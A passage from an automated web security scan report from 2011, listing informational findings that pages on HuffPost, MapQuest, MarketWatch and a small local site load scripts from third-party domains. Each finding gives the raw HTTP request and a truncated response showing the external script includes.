       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&amp;v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&amp;v47053"></script>
...[SNIP]...
<!--NDN Code-->
<script type="text/javascript" src="http://assets.newsinc.com/ndn.2.js"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.120. http://www.huffingtonpost.com/permalink-tracker.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /permalink-tracker.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://s.huffpost.com/assets/js.php?f=hp_config.js%2Chp_track.js

Request

GET /permalink-tracker.html?vertical=world HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=25
Date: Thu, 05 May 2011 01:00:35 GMT
Connection: close
Content-Length: 1324

<html>
<head>
<title>Huffit Tracker</title>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_config.js%2Chp_track.js"></script>
</head>
<body>
   <!-- Config -->    
   <
...[SNIP]...

17.121. http://www.huffingtonpost.com/rep-carolyn-maloney/the-cfpb-needs-to-get-to_b_857393.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /rep-carolyn-maloney/the-cfpb-needs-to-get-to_b_857393.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.pubmatic.com/AdServer/js/universalpixel.js
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
  • http://s.huffpost.com/assets/js.php?f=hp_scrollbar.js%2Ctwitter_serverside.js
  • http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007
  • http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&v46884
  • http://s.huffpost.com/assets/js.php?f=v.js&v47053
  • http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js

Request

GET /rep-carolyn-maloney/the-cfpb-needs-to-get-to_b_857393.html HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 179842
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:58:37 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<!-- core ad call for AOL AdTech -->
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=ie.css%2Cie7.css&amp;v46998" type="text/css" media="screen" />        
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&amp;v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&amp;v47053"></script>
...[SNIP]...
</div>


<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_scrollbar.js%2Ctwitter_serverside.js"></script>
...[SNIP]...
<!-- CommentsV3 -->
<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&amp;v46884"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.122. http://www.huffingtonpost.com/users/logout/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /users/logout/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.pubmatic.com/AdServer/js/universalpixel.js
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
  • http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007
  • http://s.huffpost.com/assets/js.php?f=v.js&v47053
  • http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js

Request

GET /users/logout/ HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 82719
Content-Type: text/html; charset=utf-8
Set-Cookie: huffpost_user_guid=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_prefs=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_smallphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_bigphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_pass=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user_id=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Expires: Thu, 05 May 2011 10:58:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<!-- core ad call for AOL AdTech -->
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=ie.css%2Cie7.css&amp;v46998" type="text/css" media="screen" />        
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&amp;v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&amp;v47053"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.123. http://www.lakewoodbeacon.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lakewoodbeacon.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://shield.sitelock.com/sitelock.js

Request

GET / HTTP/1.1
Host: www.lakewoodbeacon.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:31 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Tue, 03 May 2011 20:48:46 GMT
ETag: "b4a07965-30b8-4a2654432b8de"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 12472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<img border="0" src="//shield.sitelock.com/shield/www.lakewoodbeacon.org" id="sl_shield_image" style="cursor: pointer;"/><script id="sl_shield" src="//shield.sitelock.com/sitelock.js" language="javascript"></script><script id="sl_shield" src="//shield.sitelock.com/sitelock.js" language="javascript"></script>
...[SNIP]...

17.124. http://www.mapquest.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston
  • http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://o.aolcdn.com/omniunih.js
  • http://sns-static.aolcdn.com/openauth/aolauth.min.js

Request

GET /?ncid=txtlnkmqmq00000001 HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="PpBmGmuR4mRIyqziAQ2PxT1oEdE="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:03 GMT; Path=/
Set-Cookie: psession="B2III+t4bMnXkU9N54bv280ThuY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:03 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 00:57:02 GMT
Content-Length: 32047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...
</script>

<script src="http://sns-static.aolcdn.com/openauth/aolauth.min.js"></script>
   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston" ></script>
...[SNIP]...
<link href="http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston-fileprint" media="print" rel="stylesheet" type="text/css" />

   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston" ></script>
...[SNIP]...
<link rel="canonical" />

<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
   <script src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...

17.125. http://www.mapquest.com/directions

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /directions

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston
  • http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://o.aolcdn.com/omniunih.js
  • http://sns-static.aolcdn.com/openauth/aolauth.min.js

Request

GET /directions HTTP/1.1
Host: www.mapquest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; tsexpiry=1; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; t_Id=ZGVmYXVsdDpudWxs; c_Id=MjM5OjM5OQ%3D%3D;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 11:28:39 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 10:58:38 GMT
Content-Length: 33635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...
</script>

<script src="http://sns-static.aolcdn.com/openauth/aolauth.min.js"></script>
   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston" ></script>
...[SNIP]...
<link href="http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston-fileprint" media="print" rel="stylesheet" type="text/css" />

   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston" ></script>
...[SNIP]...
<link rel="canonical" />

<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
   <script src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...

17.126. http://www.mapquest.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /maps

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston
  • http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://o.aolcdn.com/omniunih.js
  • http://sns-static.aolcdn.com/openauth/aolauth.min.js

Request

GET /maps HTTP/1.1
Host: www.mapquest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; tsexpiry=1; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; t_Id=ZGVmYXVsdDpudWxs; c_Id=MjM5OjM5OQ%3D%3D;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 11:28:39 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 10:58:39 GMT
Content-Length: 32015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...
</script>

<script src="http://sns-static.aolcdn.com/openauth/aolauth.min.js"></script>
   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston" ></script>
...[SNIP]...
<link href="http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston-fileprint" media="print" rel="stylesheet" type="text/css" />

   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston" ></script>
...[SNIP]...
<link rel="canonical" />

<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
   <script src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...

17.127. http://www.mapquest.com/routeplanner

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /routeplanner

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston-routeplanner
  • http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://o.aolcdn.com/omniunih.js
  • http://sns-static.aolcdn.com/openauth/aolauth.min.js

Request

GET /routeplanner HTTP/1.1
Host: www.mapquest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; tsexpiry=1; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; t_Id=ZGVmYXVsdDpudWxs; c_Id=MjM5OjM5OQ%3D%3D;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 11:28:40 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 10:58:39 GMT
Content-Length: 27353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...
</script>

<script src="http://sns-static.aolcdn.com/openauth/aolauth.min.js"></script>
   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston" ></script>
...[SNIP]...
<link href="http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston-routeplanner" media="screen, projection, print" rel="stylesheet" type="text/css" />
   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston-routeplanner" ></script>

<link rel="canonical" />

<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
   <script src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...

17.128. http://www.marketwatch.com/News/Story/Story.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /News/Story/Story.aspx

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/marketwatch.com/brokerdock;u=%5e%5e;sz=230x25;tile=1;ord=312847891?
